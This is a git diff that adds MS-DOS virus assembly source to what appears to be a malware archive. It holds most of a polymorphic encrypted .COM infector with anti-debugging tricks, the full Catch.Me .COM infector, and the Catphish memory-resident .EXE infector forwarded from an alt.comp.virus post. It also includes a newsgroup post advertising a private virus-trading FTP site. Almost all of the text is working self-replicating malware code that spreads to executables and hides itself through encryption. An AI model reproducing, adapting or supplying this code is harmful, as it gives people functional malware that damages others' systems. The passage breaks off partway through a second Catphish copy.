+RAND_SEED equ -16 +ptr1 equ -18 ; pointer to start of loop code +ptr2 equ -20 ; save data_begin pointer +dat1 equ -22 ; the random code used +dat2 equ -24 ; the decode length plus random length offset, max_msk + ; to make the decode routine more difficult to detect +dat3 equ -26 ; the 'necessary crypt code' mask +; +IFNDEF stopdebug +local_stack equ 26 +max_msk equ 0ffh ; this determines the maximum variance of length +ELSE +nobugptr equ -28 +oldint3 equ -32 +oldint1 equ -36 +local_stack equ 36 +max_msk equ 0ffh ; this determines the maximum variance of length +ENDIF +; +; +; +doscall macro call_type + ifnb + mov ah, call_type + endif + int 21h + endm +; +setloc macro arg1,reg2 + mov [bp + arg1],reg2 + endm +; +getloc macro reg1,arg2 + mov reg1,[bp + arg2] + endm +; +setdat macro arg1,reg2 + mov [si + offset arg1 - offset data_begin],reg2 + endm +; +getdat macro reg1,arg2 + mov reg1,[si + offset arg2 - offset data_begin] + endm +; +regofs macro reg1,arg2 + mov reg1,si + add reg1,offset (arg2 - data_begin) + endm +; +NOBUG1 macro +IFDEF stopdebug + INT 3 + NOP +ENDIF + endm +; +nobug2 macro +IFDEF stopdebug + INT 3 +ENDIF + endm +; +; +start: + jmp entry +; +; +; + MOV AH,0 + INT 021h ; program code +; db 600h-6 dup (0) +; insert utility code here +; +entry: + + +IFDEF stopdebug + call precrypt + db 36 dup (090h) ; calculated length of offset(t41-t10) +ELSE + db 39 dup (090h) ; calculated length of offset(t41-t10) +ENDIF +; +; label the start of encoded section +entry2: + + + + + + +INCLUDE utility.asm <------- Manipulation Task Goes Here! + + + + + + + + mov bp,sp ; allocate locals + sub sp,local_stack +; + push cx +movcmd: ; this label is used to locate the next instruction + mov dx,offset data_begin + setloc ptr2,dx ; save - will be modified in 'gencode' +IFDEF stopdebug +; +; save interrupt 1 and 3 vectors +; + push ds + mov ax,0 + push ax + pop ds + cli + mov ax,ds:[int1vec] + setloc oldint1,ax + mov ax,ds:[int1vec+2] + setloc oldint1+2,ax + mov ax,ds:[int3vec] + setloc oldint3,ax + mov ax,ds:[int3vec+2] + setloc oldint3+2,ax + sti + pop ds +; + call bugon +ENDIF + mov si,dx + add si,(offset old_code - offset data_begin) + mov di,0100h + mov cx,03h + cld + repz movsb + mov si,dx + doscall 30h ; check DOS version + cmp al,0 + NOBUG1 ; 0 + jnz cont1 ; DOS > 2.0 + jmp exit +cont1: + push es + doscall 2fh ; get program DTA + NOBUG1 ; 0 + setloc dta_ptr,bx + NOBUG1 ; 0 + setloc dta_ptr+2,es + pop es + regofs dx,my_dta + doscall 1ah ; set new DTA + push es + push si + mov es,ds:[02ch] ; environment address + mov di,0 +loop1: + pop si + push si + add si,(offset path_chars - offset data_begin) + lodsb + mov cx,8000h + repnz scasb + mov cx,4 +loop2: + lodsb + scasb + jnz loop1 + loop loop2 + pop si + pop es + setloc path_start_ptr,di + mov bx,si + add si,offset (file_name-data_begin) + mov di,si + jmp cont6 + nobug2 +next_path: + cmp word ptr [bp + path_start_ptr],0 + jnz cont3 + jmp exit2 + nobug2 +cont3: + push ds + push si + mov ds,es:[002ch] + + mov di,si + mov si,es:[bp+path_start_ptr] + add di,offset (file_name-data_begin) +loop3: + lodsb + cmp al,';' ; 3bh + jz cont4 + cmp al,0 + jz cont5 + stosb + jmp loop3 + nobug2 +cont5: + mov si,0 +cont4: + pop bx + pop ds + mov [bp+path_start_ptr],si + cmp ch,0ffh + jz cont6 + mov al,'\' ; 5ch + stosb +cont6: + mov [bp+file_start_ptr],di + mov si,bx + add si,(offset com_search-offset data_begin) + mov cx,6 + repz movsb + mov si,bx + mov ah,04eh + regofs dx,file_name + mov cx,3 + doscall + jmp cont7 + nobug2 +next_file: + doscall 04fh +cont7: + jnb cont8 + jmp next_path + nobug2 +cont8: + mov ax,[si+offset(my_dta-data_begin)+016h] ; low time byte + and al,01fh + cmp al,01fh + jz next_file +IFNDEF stopdebug + cmp word ptr [si+offset(my_dta-data_begin)+01ah],0fa00h + ; file length compared; need 1.5 k spare, see rnd off +ELSE + cmp word ptr [si+offset(my_dta-data_begin)+01ah],0f800h +ENDIF + jz next_file ; with virus length + cmp word ptr [si+offset(my_dta-data_begin)+01ah],0ah + ; file to short + jz next_file + mov di,[bp+file_start_ptr] + push si + add si,offset(my_dta-data_begin+01eh) +move_name: + lodsb + stosb + cmp al,0 + jnz move_name + pop si + mov ax,04300h + regofs dx,file_name + doscall + setloc file_attr,cx + mov ax,04301h + and cx,0fffeh + regofs dx,file_name + doscall + mov ax,03d02h + regofs dx,file_name + doscall + jnb cont9 + jmp exit3 + nobug2 +cont9: + mov bx,ax + mov ax,05700h + doscall + setloc file_crea,cx + setloc file_crea+2,dx +cont10: + mov ah,3fh + mov cx,3 + regofs dx,old_code + doscall + NOBUG1 ; 1 + jb cont98 + NOBUG1 + cmp ax,3 + NOBUG1 + jnz cont98 + NOBUG1 + mov ax,04202h + NOBUG1 ;1 + mov cx,0 + mov dx,0 + doscall + jnb cont99 +cont98: + jmp exit4 +cont99: + NOBUG1 ; 2 + push bx ; save file handle + NOBUG1 + mov cx,ax + push cx + NOBUG1 + sub ax,3 + NOBUG1 + setdat jump_code+1,ax + add cx,(offset data_begin-offset entry+0100h) + NOBUG1 + mov di,si + NOBUG1 + sub di,offset data_begin-offset movcmd-1 + NOBUG1 + mov [di],cx +; + doscall 02ch ; seed the random number generator + xor dx,cx + NOBUG1 + setloc rand_seed,dx + NOBUG1 ; 2 + call random + NOBUG1 ; 3 + getloc ax,rand_seed + NOBUG1 ; 3 + and ax,max_msk ; add a random offset to actual length + NOBUG1 ; 3 + add ax,offset (data_end-entry2) ; set decode length + NOBUG1 ; 3 + setloc dat2,ax ; save the decode length + NOBUG1 ; 3 + setdat (t13+1),ax ; set decode length in 'mov cx,xxxx' + pop cx ; restore the code length of file to be infected + NOBUG1 ; 3 + add cx,offset (entry2-entry+0100h) ; add the length + ; of uncoded area plus file offset + setdat (t11+1),cx ; set decode begin in 'mov di,xxxx' + NOBUG1 ; 3 + call random + getloc ax,rand_seed + NOBUG1 ; 3 + setloc dat1,ax ; save this random key in dat1 + setdat (t12+1),ax ; set random key in 'mov ax,xxxx' + NOBUG1 ; 3 + mov di,si + NOBUG1 ; 3 + sub di,offset (data_begin-entry) + NOBUG1 ; 3 + mov bx,si + add bx,offset (l11-data_begin) ; table L11 address + mov word ptr [bp+dat3],000000111b ; required routines + call gen2 ; generate first part of decrypt + setloc ptr1,di ; save the current counter to resolve 'loop' + add bx,offset (l21-l11) ; add then next tables' offset + NOBUG1 ; 3 + mov word ptr [bp+dat3],010000011b ; required plus 'nop' + NOBUG1 ; 3 + call gen2 ; generate second part of decrypt + add bx,offset (l31-l21) ; add the next offset + NOBUG1 + call gen2 ; generate third part of decrypt + mov cx,2 ; store the loop code + getloc si,ptr2 + NOBUG1 ; 3 + add si,offset (t40-t10) ; point to the code + repz movsb ; move the code + getloc ax,ptr1 ; the loop address pointer + sub ax,di ; the current address + dec di ; point to the jump address + stosb ; resolve the jump +; fill in the remaining code +l991: + getloc cx,ptr2 ; get the data_begin pointer + sub cx,offset (data_begin-entry2) ; locate last+1 entry + cmp cx,di ; are we there yet? + je l992 ; if not then fill some more space + mov dx,0h ; any code is ok + call gencode ; generate the code + jmp l991 + nobug2 +l992: + getloc si,ptr2 ; restore si to point to data area ; + push si + mov di,si + NOBUG1 ; 4 + mov cx,offset(end1-begin1) ; move code + add si,offset(begin1-data_begin) + NOBUG1 ; 4 + add di,offset(data_end-data_begin+max_msk) ; add max_msk + mov dx,di ; set subroutine start + repz movsb ; move the code + pop si + pop bx ; restore handle + call setrtn ; find this address + add ax,06h ; <- the number necessary for proper return + push ax + jmp dx ; continue with mask & write code +; continue here after return from mask & write code + NOBUG1 ; 4 + jb exit4 + cmp ax,offset(data_end-entry) + NOBUG1 ; 4 + jnz exit4 + mov ax,04200h + mov cx,0 + mov dx,0 + doscall + jb exit4 + mov ah,040h + mov cx,3 + NOBUG1 ; 4 + regofs dx,jump_code + doscall +exit4: + getloc dx,file_crea+2 + getloc cx,file_crea + and cx,0ffe0h + or cx,0001fh + mov ax,05701h + doscall + doscall 03Eh ; close file +exit3: + mov ax,04301h + getloc cx,file_attr + regofs dx,file_name + doscall +exit2: + push ds + getloc dx,dta_ptr + getloc ds,dta_ptr+2 + doscall 01ah + pop ds +exit: + pop cx + xor ax,ax + xor bx,bx + xor dx,dx + xor si,si + mov sp,bp ; deallocate locals + mov di,0100h + push di +IFDEF stopdebug + call bugoff +ENDIF + ret +; +; common subroutines +; +; +random proc near +; + getloc cx,rand_seed ; get the seed + xor cx,813Ch ; xor random pattern + add cx,9248h ; add random pattern + ror cx,1 ; rotate + ror cx,1 ; three + ror cx,1 ; times. + setloc rand_seed,cx ; put it back + and cx,7 ; ONLY NEED LOWER 3 BITS + push cx + inc cx + xor ax,ax + stc + rcl ax,cl + pop cx + ret ; return +; +random endp +; +setrtn proc near +; + pop ax ; ret near + push ax + ret +; +setrtn endp +; +gencode proc near +; +l999: + call random + test dx,ax ; has this code been used yet? + jnz l999 ; if this code was generated - try again + or dx,ax ; set the code as used in dx + mov ax,cx ; the look-up index + sal ax,1 + push ax + xlat + mov cx,ax ; the count of instructions + pop ax + inc ax + xlat + add ax,[bp+ptr2] ; ax = address of code to be moved + mov si,ax + repz movsb ; move the code into place + ret +; +gencode endp +; +gen2 proc near +; + mov dx,0h ; used code +l990: + call gencode + mov ax,dx ; do we need more code + and ax,[bp+dat3] ; the mask for the required code + cmp ax,[bp+dat3] + jne l990 ; if still need required code - loop again + ret +; +gen2 endp +; +IFDEF stopdebug +doint3: + push bx + mov bx,sp + push ax + push si + mov si,word ptr [bx+02] + inc word ptr [bx+02] ; point to next address + setloc nobugptr,si + lodsb ; get the byte following int 3 + xor byte ptr [si],al + mov al,[bx+7] ; set the trap flag + or al,1 + mov [bx+7],al + pop si + pop ax + pop bx + iret +; +doint1: + push bx + mov bx,sp + push ax + push si + getloc si,nobugptr + lodsb + xor byte ptr [si],al + mov al,[bx+7] ; clear the trap flag + and al,0feh + mov [bx+7],al + pop si + pop ax + pop bx +bugiret: + iret +; +bugon: + pushf + push ds + push ax + mov ax,0 + push ax + pop ds + getloc ax,ptr2 + sub ax,offset(data_begin-doint3) + cli + mov ds:[int3vec],ax + getloc ax,ptr2 + sub ax,offset(data_begin-doint1) + mov ds:[int1vec],ax + push cs + pop ax + mov ds:[int1vec+2],ax + mov ds:[int3vec+2],ax + sti + pop ax + pop ds + popf + ret +; +bugoff: + pushf + push ds + push ax + mov ax,0 + push ax + pop ds + + getloc ax,oldint3 + cli + mov ds:[int3vec],ax + getloc ax,oldint1 + mov ds:[int1vec],ax + getloc ax,oldint1+2 + mov ds:[int1vec+2],ax + getloc ax,oldint3+2 + mov ds:[int3vec+2],ax + sti + + pop ax + pop ds + popf + ret +; +ENDIF +; +; +; the data area +; +data_begin label near +; +T10 LABEL NEAR +T11: MOV DI,0FFFFH +T12: MOV AX,0FFFFH +T13: MOV CX,0FFFFH +T14: CLC +T15: CLD +T16: INC SI +T17: DEC BX +T18: NOP +T19 LABEL NEAR +; +T20 LABEL NEAR +T21: XOR [DI],AX +T22: XOR [DI],CX +T23: XOR DX,CX +T24: XOR BX,CX +T25: SUB BX,AX +T26: SUB BX,CX +T27: SUB BX,DX +T28: NOP +T29 LABEL NEAR +; +T30 LABEL NEAR +T31: INC AX +T32: INC DI +T33: INC BX +T34: INC SI +T35: INC DX +T36: CLC +T37: DEC BX +T38: NOP +T39 LABEL NEAR +; +T40: LOOP T20 +T41 LABEL NEAR +; +L11: DB OFFSET (T12-T11),OFFSET (T11-data_begin) +L12: DB OFFSET (T13-T12),OFFSET (T12-data_begin) +L13: DB OFFSET (T14-T13),OFFSET (T13-data_begin) +L14: DB OFFSET (T15-T14),OFFSET (T14-data_begin) +L15: DB OFFSET (T16-T15),OFFSET (T15-data_begin) +L16: DB OFFSET (T17-T16),OFFSET (T16-data_begin) +L17: DB OFFSET (T18-T17),OFFSET (T17-data_begin) +L18: DB OFFSET (T19-T18),OFFSET (T18-data_begin) +; +L21: DB OFFSET (T22-T21),OFFSET (T21-data_begin) +L22: DB OFFSET (T23-T22),OFFSET (T22-data_begin) +L23: DB OFFSET (T24-T23),OFFSET (T23-data_begin) +L24: DB OFFSET (T25-T24),OFFSET (T24-data_begin) +L25: DB OFFSET (T26-T25),OFFSET (T25-data_begin) +L26: DB OFFSET (T27-T26),OFFSET (T26-data_begin) +L27: DB OFFSET (T28-T27),OFFSET (T27-data_begin) +L28: DB OFFSET (T29-T28),OFFSET (T28-data_begin) +; +L31: DB OFFSET (T32-T31),OFFSET (T31-data_begin) +L32: DB OFFSET (T33-T32),OFFSET (T32-data_begin) +L33: DB OFFSET (T34-T33),OFFSET (T33-data_begin) +L34: DB OFFSET (T35-T34),OFFSET (T34-data_begin) +L35: DB OFFSET (T36-T35),OFFSET (T35-data_begin) +L36: DB OFFSET (T37-T36),OFFSET (T36-data_begin) +L37: DB OFFSET (T38-T37),OFFSET (T37-data_begin) +L38: DB OFFSET (T39-T38),OFFSET (T38-data_begin) +; +; +; +; this routine is relocated after the end of data area +; this routine encrypts, writes, and decrypts the virus code +; +begin1: + getloc cx,dat2 ; get off (data_end-entry2) plus max_msk + getloc ax,dat1 ; get decode ket + mov di,si ; and set the begin encrypt address + sub di,offset (data_begin-entry2) + call crypt + mov ah,040h + mov cx,offset data_end-offset entry + mov dx,si + sub dx,offset data_begin-offset entry + doscall + pushf ; save the status of the write + push ax + getloc cx,dat2 ; get off (data_end-entry2) plus max_msk + getloc ax,dat1 + mov di,si + sub di,offset (data_begin-entry2) + call crypt + pop ax ; restore the DOS write's status + popf + ret +; +crypt: + xor [di],ax + xor [di],cx + inc ax + inc di + loop crypt + ret +end1: +; +; global work space and constants +; +old_code: db 090h,090h,090h +jump_code: db 0e9h,0,0 +com_search: db '*.COM',0 +path_chars: db 'PATH=' +file_name: db 40h DUP (0) +my_dta: db 2Bh DUP (0) + db 0,0,0 + +data_end label near +IFDEF stopdebug +; +scan_bytes db 0CCh,090h +; +precrypt: + mov bp,sp ; allocate locals + sub sp,local_stack + doscall 02ch ; seed the random number generator + xor dx,cx + setloc rand_seed,dx + call random + mov di,offset start + push ds + pop es +lp999: + mov cx,08000h + mov si,offset scan_bytes + lodsb + repnz scasb + cmp cx,0 + je done998 + cmp di,offset data_end + jge done998 + lodsb + scasb + jnz lp999 + call random + getloc ax,rand_seed + dec di + mov [di],al + inc di + xor [di],al + inc di ; skip the masked byte + jmp short lp999 +done998: + mov sp,bp + ret +ENDIF + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.catchme.asm b/MSDOS/Virus.MSDOS.Unknown.catchme.asm new file mode 100644 index 00000000..8fee61cc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.catchme.asm @@ -0,0 +1,138 @@ +;########################################################################### +# +;# Virus Name: Catch.Me # Size: 371 Bytes +# +;# Author: Jerk1N # EMail: jerk1n@trust-me.com +# +;########################################################################### +# +;# Notes +# +;# - Tells the user which files it's infecting! +# +;# - Uses NO anti-virus tricks, encryption etc. +# +;########################################################################### +# + .model tiny + .radix 16 + .code +start: + db 03h,00h,0E9h,00h,00h +gotacod: + call $+3 +getdo: pop di + sub di,offset $-1 + xchg bp,di + jmp om +msg db 'I am the Catch.Me Virus written Jerk1N of +DIFFUSION',0Dh,0Ah + db 'I am infecting files -',0Dh,0Ah,'$' +om: mov ah,1Ah + lea dx,[bp+offset dta] + int 21h + mov ah,09h + lea dx,[bp+offset msg] + int 21h + mov di,100h + lea si,[bp+offset orig] + movsw + movsw + movsb + call findfile + call fndnext +ohcrap: + push 100h + retn +fspec db '*.COM',0 +ID db '[Catch.Me]',0 +creator db '[Jerk1N/DIFFUSION]',0 +orig db 0CDh,20h,00h,00h,00h +new3 db 03h,00h,0E9h,00h,00h +findfile: + call cleara + mov ah,4Eh + mov cx,07h + lea dx,[bp+offset fspec] + int 21h + jc ohcrap + jmp infect +fndnext: + call cleara + mov ah,4Fh + int 21h + jc ohcrap + jmp infect +infect: + mov ax,4301h + mov cx,00h + lea dx,[bp+offset dta+1Eh] + int 21h ;Clear Attributes + call fopen + jc ohcrap + mov ax,4202h + xor cx,cx + xor dx,dx + int 21h + sub ax,05h + mov word ptr [bp+offset new3+3h],ax + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h + mov ah,3Fh + mov cx,5h ;Headr Len + lea dx,[bp+offset orig] + int 21h ;Get orig code! + cmp byte ptr [bp+offset orig],03h + jne goinf + cmp byte ptr [bp+offset orig+2h],0E9h + je fndnext +goinf: + mov ax,4200h + xor cx,cx + xor dx,dx + int 21h + mov ah,40h + mov cx,05h ;Headr Len + lea dx,[bp+offset new3] + int 21h ;Write Header! + mov ax,4202h + xor cx,cx + xor dx,dx + int 21h + mov ah,40h + mov cx,V_len + lea dx,[bp+offset gotacod] + int 21h ;Write Virus + call closef + lea dx,[bp+offset dta+1Eh] + mov ah,09h + int 21h + lea dx,[bp+offset retun] + int 21h + ret +cleara: + mov cx,20h + mov ax,'$$' + lea bx,[bp+offset dta+1Eh] +l: mov [bx],ax + inc bx + inc bx + loop l + ret +fopen: + mov ah,3Dh + mov al,02h + int 21h + xchg bx,ax + ret +closef: + mov ah,3Eh + int 21h + ret +V_len equ offset heap - offset gotacod +retun db 0Dh,0Ah,'$' +heap: ;Destroy all data below this line +dta equ $ + end \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.catphish.asm b/MSDOS/Virus.MSDOS.Unknown.catphish.asm new file mode 100644 index 00000000..a8632e1c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.catphish.asm @@ -0,0 +1,552 @@ +From smtp Sun Jan 29 16:25 EST 1995 +Received: from ids.net by POBOX.jwu.edu; Sun, 29 Jan 95 16:25 EST +Date: Sun, 29 Jan 1995 16:18:52 -0500 (EST) +From: ids.net!JOSHUAW (JOSHUAW) +To: pobox.jwu.edu!joshuaw +Content-Length: 11874 +Content-Type: text +Message-Id: <950129161852.10074@ids.net> +Status: RO + +To: joshuaw@pobox.jwu.edu +Subject: (fwd) CATPHISH.ASM +Newsgroups: alt.comp.virus + +Path: paperboy.ids.net!uunet!cs.utexas.edu!uwm.edu!msunews!news.mtu.edu!news.mtu.edu!not-for-mail +From: jdmathew@mtu.edu (Icepick) +Newsgroups: alt.comp.virus +Subject: CATPHISH.ASM +Date: 26 Jan 1995 13:06:15 -0500 +Organization: Michigan Technological University +Lines: 486 +Message-ID: <3g8oan$54g@maxwell11.ee> +NNTP-Posting-Host: maxwell11.ee.mtu.edu +X-Newsreader: TIN [version 1.2 PL1] + + + +name VIRUSTEST + title +code segment + assume cs:code, ds:code, es:code + org 100h + +;-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +; The Catphish Virus. +; +; The Catphish virus is a resident .EXE infector. +; Size: 678 bytes (decimal). +; No activation (bomb). +; Saves date and file attributes. +; +; If assembling, check_if_resident jump must be marked over +; with nop after first execution (first execution will hang +; system). +; +; *** Source is made available to learn from, not to +; change author's name and claim credit! *** + +start: + call setup ; Find "delta offset". +setup: + pop bp + sub bp, offset setup-100h + jmp check_if_resident ; See note above about jmp! + +pre_dec_em: + mov bx,offset infect_header-100h + add bx,bp + mov cx,endcrypt-infect_header + +ror_em: + mov dl,byte ptr cs:[bx] + ror dl,1 ; Decrypt virus code + mov byte ptr cs:[bx],dl ; by rotating right. + inc bx + loop ror_em + + jmp check_if_resident + +;--------------------------------- Infect .EXE header ----------------------- +; The .EXE header modifying code below is my reworked version of +; Dark Angel's code found in his Phalcon/Skism virus guides. + + +infect_header: + push bx + push dx + push ax + + + + mov bx, word ptr [buffer+8-100h] ; Header size in paragraphs + ; ^---make sure you don't destroy the file handle + mov cl, 4 ; Multiply by 16. Won't + shl bx, cl ; work with headers > 4096 + ; bytes. Oh well! + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + ; Now DX:AX is loaded with file size minus header size + mov cx, 10h ; DX:AX/CX = AX Remainder DX + div cx + + + mov word ptr [buffer+14h-100h], dx ; IP Offset + mov word ptr [buffer+16h-100h], ax ; CS Displacement in module + + + mov word ptr [buffer+0Eh-100h], ax ; Paragraph disp. SS + mov word ptr [buffer+10h-100h], 0A000h ; Starting SP + + pop ax + pop dx + + add ax, endcode-start ; add virus size + cmp ax, endcode-start + jb fix_fault + jmp execont + + +war_cry db 'Cry Havoc, and let slip the Dogs of War!',0 +v_name db '[Catphish]',0 ; Virus name. +v_author db 'FirstStrike',0 ; Me. +v_stuff db 'Kraft!',0 + + +fix_fault: + add dx,1d + +execont: + push ax + mov cl, 9 + shr ax, cl + ror dx, cl + stc + + adc dx, ax + pop ax + and ah, 1 + + + mov word ptr [buffer+4-100h], dx ; Fix-up the file size in + mov word ptr [buffer+2-100h], ax ; the EXE header. + + pop bx + retn ; Leave subroutine + +;---------------------------------------------------------------------------- + + +check_if_resident: + push es + xor ax,ax + mov es,ax + + cmp word ptr es:[63h*4],0040h ; Check to see if virus + jnz grab_da_vectors ; is already resident + jmp exit_normal ; by looking for a 40h + ; signature in the int 63h + ; offset section of + ; interrupt table. + +grab_da_vectors: + + mov ax,3521h ; Store original int 21h + int 21h ; vector pointer. + mov word ptr cs:[bp+dos_vector-100h],bx + mov word ptr cs:[bp+dos_vector+2-100h],es + + + +load_high: + push ds + +find_chain: ; Load high routine that + ; uses the DOS internal + mov ah,52h ; table function to find + int 21h ; start of MCB and then + ; scales up chain to + mov ds,es: word ptr [bx-2] ; find top. (The code + assume ds:nothing ; is long, but it is the + ; only code that would + xor si,si ; work when an infected + ; .EXE was to be loaded +Middle_check: ; into memory. + + cmp byte ptr ds:[0],'M' + jne Check4last + +add_one: + mov ax,ds + add ax,ds:[3] + inc ax + + mov ds,ax + jmp Middle_check + +Check4last: + cmp byte ptr ds:[0],'Z' + jne Error + mov byte ptr ds:[0],'M' + sub word ptr ds:[3],(endcode-start+15h)/16h+1 + jmp add_one + +error: + mov byte ptr ds:[0],'Z' + mov word ptr ds:[1],008h + mov word ptr ds:[3],(endcode-start+15h)/16h+1 + + push ds + pop ax + inc ax + push ax + pop es + + + + + +move_virus_loop: + mov bx,offset start-100h ; Move virus into carved + add bx,bp ; out location in memory. + mov cx,endcode-start + push bp + mov bp,0000h + +move_it: + mov dl, byte ptr cs:[bx] + mov byte ptr es:[bp],dl + inc bp + inc bx + loop move_it + pop bp + + + +hook_vectors: + + mov ax,2563h ; Hook the int 21h vector + mov dx,0040h ; which means it will + int 21h ; point to virus code in + ; memory. + mov ax,2521h + mov dx,offset virus_attack-100h + push es + pop ds + int 21h + + + + + pop ds + + + +exit_normal: ; Return control to + pop es ; infected .EXE + mov ax, es ; (Dark Angle code.) + add ax, 10h + add word ptr cs:[bp+OrigCSIP+2-100h], ax + + cli + add ax, word ptr cs:[bp+OrigSSSP+2-100h] + mov ss, ax + mov sp, word ptr cs:[bp+OrigSSSP-100h] + sti + + xor ax,ax + xor bp,bp + +endcrypt label byte + + db 0eah +OrigCSIP dd 0fff00000h +OrigSSSP dd ? + +exe_attrib dw ? +date_stamp dw ? +time_stamp dw ? + + + +dos_vector dd ? + +buffer db 18h dup(?) ; .EXE header buffer. + + + + +;---------------------------------------------------------------------------- + + +virus_attack proc far + assume cs:code,ds:nothing, es:nothing + + + cmp ax,4b00h ; Infect only on file + jz run_kill ; executions. + +leave_virus: + jmp dword ptr cs:[dos_vector-100h] + + + +run_kill: + call infectexe + jmp leave_virus + + + + + +infectexe: ; Same old working horse + push ax ; routine that infects + push bx ; the selected file. + push cx + push es + push dx + push ds + + + + mov cx,64d + mov bx,dx + +findname: + cmp byte ptr ds:[bx],'.' + jz o_k + inc bx + loop findname + +pre_get_out: + jmp get_out + +o_k: + cmp byte ptr ds:[bx+1],'E' ; Searches for victims. + jnz pre_get_out + cmp byte ptr ds:[bx+2],'X' + jnz pre_get_out + cmp byte ptr ds:[bx+3],'E' + jnz pre_get_out + + + + +getexe: + mov ax,4300h + call dosit + + mov word ptr cs:[exe_attrib-100h],cx + + mov ax,4301h + xor cx,cx + call dosit + +exe_kill: + mov ax,3d02h + call dosit + xchg bx,ax + + mov ax,5700h + call dosit + + mov word ptr cs:[time_stamp-100h],cx + mov word ptr cs:[date_stamp-100h],dx + + + + push cs + pop ds + + mov ah,3fh + mov cx,18h + mov dx,offset buffer-100h + call dosit + + cmp word ptr cs:[buffer+12h-100h],1993h ; Looks for virus marker + jnz infectforsure ; of 1993h in .EXE + jmp close_it ; header checksum + ; position. +infectforsure: + call move_f_ptrfar + + push ax + push dx + + + call store_header + + pop dx + pop ax + + call infect_header + + + push bx + push cx + push dx + + + mov bx,offset infect_header-100h + mov cx,(endcrypt)-(infect_header) + +rol_em: ; Encryption via + mov dl,byte ptr cs:[bx] ; rotating left. + rol dl,1 + mov byte ptr cs:[bx],dl + inc bx + loop rol_em + + pop dx + pop cx + pop bx + + mov ah,40h + mov cx,endcode-start + mov dx,offset start-100h + call dosit + + + mov word ptr cs:[buffer+12h-100h],1993h + + + call move_f_ptrclose + + mov ah,40h + mov cx,18h + mov dx,offset buffer-100h + call dosit + + mov ax,5701h + mov cx,word ptr cs:[time_stamp-100h] + mov dx,word ptr cs:[date_stamp-100h] + call dosit + +close_it: + + + mov ah,3eh + call dosit + +get_out: + + + pop ds + pop dx + +set_attrib: + mov ax,4301h + mov cx,word ptr cs:[exe_attrib-100h] + call dosit + + + pop es + pop cx + pop bx + pop ax + + retn + +;---------------------------------- Call to DOS int 21h --------------------- + +dosit: ; DOS function call code. + pushf + call dword ptr cs:[dos_vector-100h] + retn + +;---------------------------------------------------------------------------- + + + + + + + + + + +;-------------------------------- Store Header ----------------------------- + +store_header: + les ax, dword ptr [buffer+14h-100h] ; Save old entry point + mov word ptr [OrigCSIP-100h], ax + mov word ptr [OrigCSIP+2-100h], es + + les ax, dword ptr [buffer+0Eh-100h] ; Save old stack + mov word ptr [OrigSSSP-100h], es + mov word ptr [OrigSSSP+2-100h], ax + + retn + +;--------------------------------------------------------------------------- + + + + + + +;---------------------------------- Set file pointer ------------------------ + +move_f_ptrfar: ; Code to move file pointer. + mov ax,4202h + jmp short move_f + +move_f_ptrclose: + mov ax,4200h + +move_f: + xor dx,dx + xor cx,cx + call dosit + retn + +;---------------------------------------------------------------------------- + + +endcode label byte + +endp + +code ends +end start + +From smtp Fri Jan 27 13:23 EST 1995 +Received: from ids.net by POBOX.jwu.edu; Fri, 27 Jan 95 13:23 EST +Date: Fri, 27 Jan 1995 13:21:38 -0500 (EST) +From: ids.net!JOSHUAW (JOSHUAW) +To: pobox.jwu.edu!joshuaw +Content-Length: 1179 +Content-Type: binary +Message-Id: <950127132138.b52b@ids.net> +Status: RO + +To: joshuaw@pobox.jwu.edu +Subject: (fwd) Private Virii FTP Site +Newsgroups: alt.comp.virus + +Path: paperboy.ids.net!uunet!nntp.crl.com!crl12.crl.com!not-for-mail +From: yojimbo@crl.com (Douglas Mauldin) +Newsgroups: alt.comp.virus +Subject: Private Virii FTP Site +Date: 24 Jan 1995 22:01:53 -0800 +Organization: CRL Dialup Internet Access (415) 705-6060 [Login: guest] +Lines: 14 +Message-ID: <3g4pgh$ka2@crl12.crl.com> +NNTP-Posting-Host: crl12.crl.com +X-Newsreader: TIN [version 1.2 PL2] + +I run THe QUaRaNTiNE, a private FTP site for viral reseachers/coders. I'm +always on the lookout for new viral material. If you'd like access, or +like to trade, email me a list of your collection. + +Serious inquiries only. + + 哪涅 哪-涅哪哪- - 哪哪涅满哪哪-- 哪哪- 哪-涅您 + Yojimbo [碡腈韂 Fast as the Wind + SysOp: The Dojo BBS Quiet as the Forest + 1.7i3.436.1795 Aggressive as Fire + QUaRaNTiNE HomeSite And + THe ULTiMaTE ViRaL InFeCTiON Immovable as a Mountain +  -涅哪哪哪哪涅哪哪 哪 哪哪哪-哪哪哪哪涅哪 + + diff --git a/MSDOS/Virus.MSDOS.Unknown.catphish1.asm b/MSDOS/Virus.MSDOS.Unknown.catphish1.asm new file mode 100644 index 00000000..6c390cf4 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.catphish1.asm @@ -0,0 +1,675 @@ + +name VIRUSTEST + title +code segment + assume cs:code, ds:code, es:code + org 100h + +;-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +; FirstStrike presents: +; +; The Catphish Virus. +; +; The Catphish virus is a resident .EXE infector. +; Size: 678 bytes (decimal). +; No activation (bomb). +; Saves date and file attributes. +; +; If assembling, check_if_resident jump must be marked over +; with nop after first execution (first execution will hang +; system). +; +; *** Source is made available to learn from, not to +; change author's name and claim credit! *** + +start: + call setup ; Find "delta offset". +setup: + pop bp + sub bp, offset setup-100h + jmp check_if_resident ; See note above about jmp! + +pre_dec_em: + mov bx,offset infect_header-100h + add bx,bp + mov cx,endcrypt-infect_header + +ror_em: + mov dl,byte ptr cs:[bx] + ror dl,1 ; Decrypt virus code + mov byte ptr cs:[bx],dl ; by rotating right. + inc bx + loop ror_em + + jmp check_if_resident + +;--------------------------------- Infect .EXE header ----------------------- +; The .EXE header modifying code below is my reworked version of +; Dark Angel's code found in his Phalcon/Skism virus guides. + + +infect_header: + push bx + push dx + push ax + + + + mov bx, word ptr [buffer+8-100h] ; Header size in paragraphs + ; ^---make sure you don't destroy the file handle + mov cl, 4 ; Multiply by 16. Won't + shl bx, cl ; work with headers > 4096 + ; bytes. Oh well! + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + ; Now DX:AX is loaded with file size minus 